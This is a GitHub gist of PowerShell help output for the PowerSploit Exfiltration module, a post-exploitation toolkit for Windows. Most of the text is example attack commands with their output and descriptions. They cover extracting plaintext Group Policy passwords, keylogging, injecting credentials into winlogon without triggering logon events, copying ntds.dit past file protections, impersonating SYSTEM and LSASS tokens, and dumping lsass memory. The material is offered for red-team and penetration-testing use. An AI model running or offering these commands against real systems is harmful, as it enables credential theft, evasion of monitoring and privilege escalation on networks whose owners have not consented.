Skip to content

Instantly share code, notes, and snippets.

@carnal0wnage

carnal0wnage/gist:73ccc44c5b8fc5c53fcb

Last active August 16, 2016 10:27
Show Gist options
  • Save carnal0wnage/73ccc44c5b8fc5c53fcb to your computer and use it in GitHub Desktop.
Save carnal0wnage/73ccc44c5b8fc5c53fcb to your computer and use it in GitHub Desktop.
Download ZIP
PowerSploit Exfiltration Examples Documentation
Raw
gistfile1.txt
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Command -Module Exfiltration
CommandType Name ModuleName
----------- ---- ----------
Function Get-GPPPassword Exfiltration
Function Get-Keystrokes Exfiltration
Function Get-TimedScreenshot Exfiltration
Function Get-VaultCredential Exfiltration
Function Get-VolumeShadowCopy Exfiltration
Function Invoke-CredentialInjection Exfiltration
Function Invoke-NinjaCopy Exfiltration
Function Invoke-TokenManipulation Exfiltration
Function Mount-VolumeShadowCopy Exfiltration
Function Out-Minidump Exfiltration
-----------
Get-GPPPassword
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Get-GPPPassword -examples
NAME
Get-GPPPassword
SYNOPSIS
Retrieves the plaintext password and other information for accounts pushed
through Group Policy Preferences.
PowerSploit Function: Get-GPPPassword
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Version: 2.4.2
-------------------------- EXAMPLE 1 --------------------------
PS C:\>Get-GPPPassword
NewName : [BLANK]
Changed : {2014-02-21 05:28:53}
Passwords : {password12}
UserNames : {test1}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00
C04FB984F9}\MACHINE\Preferences\DataSources\DataSources.xml
NewName : {mspresenters}
Changed : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48}
Passwords : {Recycling*3ftw!, password123, password1234}
UserNames : {Administrator (built-in), DummyAccount, dummy2}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00
C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
NewName : [BLANK]
Changed : {2014-02-21 05:29:53, 2014-02-21 05:29:52}
Passwords : {password, password1234$}
UserNames : {administrator, admin}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00
C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml
NewName : [BLANK]
Changed : {2014-02-21 05:30:14, 2014-02-21 05:30:36}
Passwords : {password, read123}
UserNames : {DEMO\Administrator, admin}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00
C04FB984F9}\MACHINE\Preferences\Services\Services.xml
-------------------------- EXAMPLE 2 --------------------------
PS C:\>Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq
password
password12
password123
password1234
password1234$
read123
Recycling*3ftw!
-----
Get-Keystrokes
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Get-Keystrokes -examples
NAME
Get-Keystrokes
SYNOPSIS
Logs keys pressed, time and the active window.
PowerSploit Function: Get-Keystrokes
Author: Chris Campbell (@obscuresec) and Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
-------------------------- EXAMPLE 1 --------------------------
C:\PS>Get-Keystrokes -LogPath C:\key.log
-------------------------- EXAMPLE 2 --------------------------
C:\PS>Get-Keystrokes -CollectionInterval 20
-----
Get-TimedScreenshot
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Get-TimedScreenshot -examples
NAME
Get-TimedScreenshot
SYNOPSIS
Takes screenshots at a regular interval and saves them to disk.
PowerSploit Function: Get-TimedScreenshot
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
-------------------------- EXAMPLE 1 --------------------------
PS C:\>Get-TimedScreenshot -Path c:\temp\ -Interval 30 -EndTime 14:00
-----
Get-VaultCredential
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Get-VaultCredential -examples
NAME
Get-VaultCredential
SYNOPSIS
Displays Windows vault credential objects including cleartext web
credentials.
PowerSploit Function: Get-VaultCredential
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
-------------------------- EXAMPLE 1 --------------------------
C:\PS>Get-VaultCredential
-----
Get-VolumeShadowCopy
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Get-VolumeShadowCopy -examples
NAME
Get-VolumeShadowCopy
SYNOPSIS
Lists the device paths of all local volume shadow copies.
PowerSploit Function: Get-VolumeShadowCopy
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Version: 2.0.0
-----
Invoke-CredentialInjection
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Invoke-CredentialInjection -examples
NAME
Invoke-CredentialInjection
SYNOPSIS
This script allows an attacker to create logons with clear-text
credentials without triggering a suspicious Event ID 4648 (Explicit
Credential Logon).
The script either creates a suspended winlogon.exe process running as
SYSTEM, or uses an existing WinLogon process. Then, it injects a DLL in to
winlogon.exe which calls LsaLogonUser to create a logon from within
winlogon.exe (which is where it is called from when a user logs in using
RDP or
logs on locally). The injected DLL then impersonates the new logon token
with its current thread so that it can be kidnapped using
Invoke-TokenManipulation.
PowerSploit Function: Invoke-CredentialInjection
Author: Joe Bialek, Twitter: @JosephBialek
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Version: 1.1
-------------------------- EXAMPLE 1 --------------------------
C:\PS>Invoke-CredentialInjection -DomainName "demo" -UserName
"administrator" -Password "Password1" -NewWinLogon
Creates a new winlogon process (as the SYSTEM account) and creates a logon
from within the process as demo\administrator. The logon will default to
RemoteInteractive (an RDP logon). Defaults to using the Kerberos provider.
-------------------------- EXAMPLE 2 --------------------------
C:\PS>Invoke-CredentialInjection -DomainName "demo" -UserName
"administrator" -Password "Password1" -ExistingWinLogon -LogonType
NetworkCleartext
Uses an existing winlogon process and creates a loogn from within it as
demo\administrator. The logon will be type NetworkCleartext (used in basic
auth
and PowerShell w/ CredSSP). Defaults to using the Kerberos provider.
-------------------------- EXAMPLE 3 --------------------------
C:\PS>Invoke-CredentialInjection -DomainName "demo" -UserName
"administrator" -Password "Password1" -NewWinLogon -AuthPackage Msv1_0
Creates a new winlogon process (as the SYSTEM account) and creates a logon
from within the process as demo\administrator. The logon will default to
RemoteInteractive (and RDP logon). The logon will use the Msv1_0 auth
package (NTLM).
-----
Invoke-NinjaCopy
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Invoke-NinjaCopy -examples
NAME
Invoke-NinjaCopy
SYNOPSIS
This script can copy files off an NTFS volume by opening a read handle to
the entire volume (such as c:) and parsing the NTFS structures. This
requires you
are an administrator of the server. This allows you to bypass the
following protections:
1. Files which are opened by a process and cannot be opened by other
processes, such as the NTDS.dit file or SYSTEM registry hives
2. SACL flag set on a file to alert when the file is opened (I'm not
using a Win32 API to open the file, so Windows has no clue)
3. Bypass DACL's, such as a DACL which only allows SYSTEM to open a
file
If the LocalDestination param is specified, the file will be copied to the
file path specified on the local server (the server the script is being
run from).
If the RemoteDestination param is specified, the file will be copied to
the file path specified on the remote server.
The script works by opening a read handle to the volume (which if logged,
may stand out, but I don't think most people log this and other processes
do it too).
The script then uses NTFS parsing code written by cyb70289 and posted to
CodePlex to parse the NTFS structures. Since the NTFS parsing code is
written
in C++, I have compiled the code to a DLL and load it reflective in to
PowerShell using the Invoke-ReflectivePEInjection.ps1 script (see below
for a link
to the original script).
Script: Invoke-NinjaCopy.ps1
Author: Joe Bialek, Twitter: @JosephBialek
Contributors: This script has a byte array hardcoded, which contains a DLL
wich parses NTFS. This NTFS parsing code was written by cyb70289
<cyb70289@gmail.com>
See the following link:
http://www.codeproject.com/Articles/81456/An-NTFS-Parser-Lib
The source code is also available with the
distribution of this script.
License: GPLv3 or later
Required Dependencies: None
Optional Dependencies: None
Version: 1.1
ReflectivePEInjection version: 1.1
-------------------------- EXAMPLE 1 --------------------------
C:\PS>Read the file ntds.dit from a remote server and write it to
c:\test\ntds.dit on the local server
$NtdsBytes = Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit"
-ComputerName "Server1" -LocalDestination "c:\test\ntds.dit"
-------------------------- EXAMPLE 2 --------------------------
C:\PS>Read the file ntds.dit from a remote server and copy it to the temp
directory on the remote server.
Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -RemoteDestination
"c:\windows\temp\ntds.dit" -ComputerName "Server1"
-------------------------- EXAMPLE 3 --------------------------
C:\PS>Read the file ntds.dit from the local server and copy it to the temp
directory on the local server.
Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination
"c:\windows\temp\ntds.dit"
-----
Invoke-TokenManipulation
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Invoke-TokenManipulation -examples
NAME
Invoke-TokenManipulation
SYNOPSIS
This script requires Administrator privileges. It can enumerate the Logon
Tokens available and use them to create new processes. This allows you to
use another user's credentials over the network by creating a process with
their logon token. This will work even with Windows 8.1 LSASS protections.
This functionality is very similar to the incognito tool (with some
differences, and different use goals).
This script can also make the PowerShell thread impersonate another users
Logon Token. Unfortunately this doesn't work well, because PowerShell
creates new threads to do things, and those threads will use the Primary
token of the PowerShell process (your original token) and not the token
that one thread is impersonating. Because of this, you cannot use thread
impersonation to impersonate a user and then use PowerShell remoting to
connect to another server as that user (it will authenticate using the primary
token of the process, which is your original logon token).
Because of this limitation, the recommended way to use this script is to
use CreateProcess to create a new PowerShell process with another users
Logon Token, and then use this process to pivot. This works because the entire
process is created using the other users Logon Token, so it will use their
credentials for the authentication.
IMPORTANT: If you are creating a process, by default this script will
modify the ACL of the current users desktop to allow full control to
"Everyone".
This is done so that the UI of the process is shown. If you do not need
the UI, use the -NoUI flag to prevent the ACL from being modified. This ACL
is not permanent, as in, when the current logs off the ACL is cleared. It
is still preferable to not modify things unless they need to be modified
though, so I created the NoUI flag. ALSO: When creating a process, the script will
request SeSecurityPrivilege so it can enumerate and modify the ACL of the
desktop.
This could show up in logs depending on the level of monitoring.
PERMISSIONS REQUIRED:
SeSecurityPrivilege: Needed if launching a process with a UI that needs to
be rendered. Using the -NoUI flag blocks this.
SeAssignPrimaryTokenPrivilege : Needed if launching a process while the
script is running in Session 0.
Important differences from incognito:
First of all, you should probably read the incognito white paper to
understand what incognito does. If you use incognito, you'll notice it
differentiates between "Impersonation" and "Delegation" tokens. This is because incognito
can be used in situations where you get remote code execution against a
service which has threads impersonating multiple users. Incognito can enumerate
all tokens available to the service process, and impersonate them (which
might allow you to elevate privileges). This script must be run as administrator, and
because you are already an administrator, the primary use of this script
is for pivoting without dumping credentials.
In this situation, Impersonation vs Delegation does not matter because an
administrator can turn any token in to a primary token (delegation
rights). What does matter is the logon type used to create the logon token. If a user
connects using Network Logon (aka type 3 logon), the computer will not
have any credentials for the user. Since the computer has no credentials associated with the token,
it will not be possible to authenticate off-box with the token. All other
logon types should have credentials associated with them (such as Interactive logon,
Service logon, Remote interactive logon, etc). Therefore, this script looks
for tokens which were created with desirable logon tokens (and only
displays them by default).
In a nutshell, instead of worrying about "delegation vs impersonation"
tokens, you should worry about NetworkLogon (bad) vs Non-NetworkLogon
(good).
PowerSploit Function: Invoke-TokenManipulation
Author: Joe Bialek, Twitter: @JosephBialek
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Version: 1.11
(1.1 -> 1.11: PassThru of System.Diagnostics.Process object added by Rune
Mariboe, https://www.linkedin.com/in/runemariboe)
-------------------------- EXAMPLE 1 --------------------------
C:\PS>Invoke-TokenManipulation -Enumerate
Lists all unique usable tokens on the computer.
-------------------------- EXAMPLE 2 --------------------------
C:\PS>Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "nt
authority\system"
Spawns cmd.exe as SYSTEM.
-------------------------- EXAMPLE 3 --------------------------
C:\PS>Invoke-TokenManipulation -ImpersonateUser -Username "nt
authority\system"
Makes the current PowerShell thread impersonate SYSTEM.
-------------------------- EXAMPLE 4 --------------------------
C:\PS>Invoke-TokenManipulation -CreateProcess "cmd.exe" -ProcessId 500
Spawns cmd.exe using the primary token belonging to process ID 500.
-------------------------- EXAMPLE 5 --------------------------
C:\PS>Invoke-TokenManipulation -ShowAll
Lists all tokens available on the computer, including non-unique tokens
and tokens created using NetworkLogon.
-------------------------- EXAMPLE 6 --------------------------
C:\PS>Invoke-TokenManipulation -CreateProcess "cmd.exe" -ThreadId 500
Spawns cmd.exe using the token belonging to thread ID 500.
-------------------------- EXAMPLE 7 --------------------------
C:\PS>Get-Process wininit | Invoke-TokenManipulation -CreateProcess
"cmd.exe"
Spawns cmd.exe using the primary token of LSASS.exe. This pipes the output
of Get-Process to the "-Process" parameter of the script.
-------------------------- EXAMPLE 8 --------------------------
C:\PS>(Get-Process wininit | Invoke-TokenManipulation -CreateProcess
"cmd.exe" -PassThru).WaitForExit()
Spawns cmd.exe using the primary token of LSASS.exe. Then holds the
spawning PowerShell session until that process has exited.
-------------------------- EXAMPLE 9 --------------------------
C:\PS>Get-Process wininit | Invoke-TokenManipulation -ImpersonateUser
Makes the current thread impersonate the lsass security token.
-----
Mount-VolumeShadowCopy
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Mount-VolumeShadowCopy -examples
NAME
Mount-VolumeShadowCopy
SYNOPSIS
Mounts a volume shadow copy.
PowerSploit Function: Mount-VolumeShadowCopy
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Version: 2.0.0
-------------------------- EXAMPLE 1 --------------------------
C:\PS>Get-VolumeShadowCopy | Mount-VolumeShadowCopy -Path C:\VSS
Description
-----------
Create a mount point in 'C:\VSS' for each volume shadow copy volume
-------------------------- EXAMPLE 2 --------------------------
C:\PS>Mount-VolumeShadowCopy -Path C:\VSS -DevicePath
'\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4'
-------------------------- EXAMPLE 3 --------------------------
C:\PS>Get-WmiObject Win32_ShadowCopy | % { $_.DeviceObject -Path C:\VSS
-DevicePath $_ }
-----
Out-Minidump
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Out-Minidump -examples
NAME
Out-Minidump
SYNOPSIS
Generates a full-memory minidump of a process.
PowerSploit Function: Out-Minidump
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
-------------------------- EXAMPLE 1 --------------------------
C:\PS>Out-Minidump -Process (Get-Process -Id 4293)
Description
-----------
Generate a minidump for process ID 4293.
-------------------------- EXAMPLE 2 --------------------------
C:\PS>Get-Process lsass | Out-Minidump
Description
-----------
Generate a minidump for the lsass process. Note: To dump lsass, you must be
running from an elevated prompt.
-------------------------- EXAMPLE 3 --------------------------
C:\PS>Get-Process | Out-Minidump -DumpFilePath C:\temp
Description
-----------
Generate a minidump of all running processes and save them to C:\temp.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment